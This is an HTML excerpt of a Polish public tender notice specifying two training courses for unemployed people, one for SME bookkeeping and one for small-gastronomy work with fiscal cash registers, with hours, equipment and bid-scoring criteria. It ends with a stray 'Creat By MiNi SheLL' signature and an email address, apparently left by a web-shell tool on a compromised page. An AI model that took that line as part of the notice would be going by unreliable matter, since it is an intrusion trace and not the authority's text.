<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest przygotowanie uczestników do prowadzenia księgowości w małych i średnich przedsiębiorstwach (MŚP) i nabycie umiejętności obsługi aktualnie stosowanych księgowych programów komputerowych. Szkolenie powinno zostać zrealizowane z wykorzystaniem modułowego programu szkolenia zawodowego dla zawodu Księgowy (samodzielny) - kod zawodu: 343201, dostępnego w bazie danych prowadzonej przez Ministra Pracy i Polityki Społecznej na stronie internetowej: www.standardyiszkolenia.praca.gov.pl, w ramach wybranych modułów zgodnych z kierunkiem niniejszego szkolenia. 
Zakres tematyczny szkolenia powinien obejmować:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian oraz metody i techniki poszukiwania pracy, nastawiony na zmianę postaw uczestników szkolenia, zmotywowanie ich i przygotowanie do aktywnego poszukiwania pracy. Zajęcia te powinny odbywać się w formie ćwiczeń, warsztatów. Pod koniec realizacji szkolenia każdy uczestnik powinien zostać objęty coachingiem, polegającym na pomocy 
i kierowaniu rozwojem umiejętności oraz kompetencji osoby, prowadzonym indywidualnie przez trenera. Łącznie zagadnienia te powinny obejmować 30 godzin (w tym 2 godziny coachingu).
II BLOK: Aktualne zagadnienia obejmujące wiedzę i umiejętności praktyczne z zakresu księgowości, w tym m.in.: obowiązujące uregulowania prawne, podatkowe 
i zasady finansowo - księgowe. Łącznie zagadnienia te powinny obejmować 130 godzin.
III BLOK: Wykorzystanie programów komputerowych w zakresie ewidencji księgowej w małych i średnich przedsiębiorstwach (minimum dwa komputerowe programy księgowe często stosowanie przez firmy z sektora MŚP) - łącznie 80 godzin.
IV BLOK: Zajęcia praktyczne - na zasadzie firmy symulacyjnej prowadzone przez instruktorów - specjalistów w danej dziedzinie. Zajęcia praktyczne powinny odbywać się na symulacyjnym stanowisku pracy, z wykorzystaniem dokumentów, obowiązujących druków i dowodów księgowych stosowanych w małych i średnich przedsiębiorstwach. Zakres programowy powinien odpowiadać czynnościom wykonywanym przez pracowników w działach księgowości MŚP. Łączna liczba godzin: 160 godzin. Wykonawca powinien zagwarantować dla uczestników szkolenia minimum 20 komputerów + 1 komputer dla instruktora, tak, aby każda osoba miała zapewnione samodzielne stanowisko komputerowe..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KURS PRACOWNIKA MAŁEJ GASTRONOMII Z OBSŁUGĄ KASY FISKALNEJ I NOWOCZESNĄ OBSŁUGĄ KLIENTA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest uzyskanie przez osoby bezrobotne kwalifikacji w zakresie pracownika małej gastronomii. Program szkolenia powinien zapewnić uczestnikom nabycie obecnie obowiązujących umiejętności poszukiwanych przez pracodawców w pracy w małej gastronomii, w tym umiejętności obsługi kasy fiskalnej 
i nowoczesnej obsługi klienta.
Zakres tematyczny szkolenia powinien obejmować:
I BLOK: Trening interpersonalny, w tym trening gotowości do zmian oraz metody i techniki poszukiwania pracy. Łącznie zagadnienia te powinny obejmować 30 godzin.
II BLOK: Zagadnienia teoretyczne niezbędne do pracy w małej gastronomii, w tym m.in.:
- przestrzeganie przepisów bezpieczeństwa i higieny pracy i przepisów przeciwpożarowych oraz wymogów higieniczno - sanitarnych;
- przygotowanie stanowiska pracy zgodnie z obowiązującymi wymogami;
- rozmieszczenie maszyn i urządzeń w zakładzie gastronomicznym;
- czynności porządkowe w kuchni;
- techniki mycia naczyń i urządzeń kuchennych;
- przechowywanie surowców i przygotowanie do obróbki wstępnej;
- nowoczesna obsługa klienta. 
Łączna liczba godzin obejmująca powyższe zagadnienia  powinna wynosić 80 godzin. 
III BLOK: Zajęcia praktyczne w zakładach pracy - 160 godzin.
IV BLOK: Obsługa kasy fiskalnej - 30 godzin (w tym: 20 godzin zajęć praktycznych)
Wykonawca powinien zagwarantować taką ilość kas fiskalnych jednocześnie, aby podczas zajęć praktycznych na jedną kasę przypadały maksymalnie dwie osoby (kupujący-sprzedający), tj. minimum 10 kas fiskalnych. Zajęcia praktyczne w zakładach pracy powinny odbywać się w grupach liczbowo dostosowanych 
do wielkości i warunków wybranych obiektów gastronomicznych, zapewniających indywidualne podejście do kursanta. Należy zapewnić optymalną ilość oraz odpowiednią jakość bazy do realizacji zajęć praktycznych, dostosowaną do liczby uczestników szkolenia, a także zapewnić niezbędną odzież ochronną. Należy zapewnić kadrę dydaktyczną w zakresie instruktorów do zajęć praktycznych w zaproponowanych obiektach gastronomicznych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>4. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com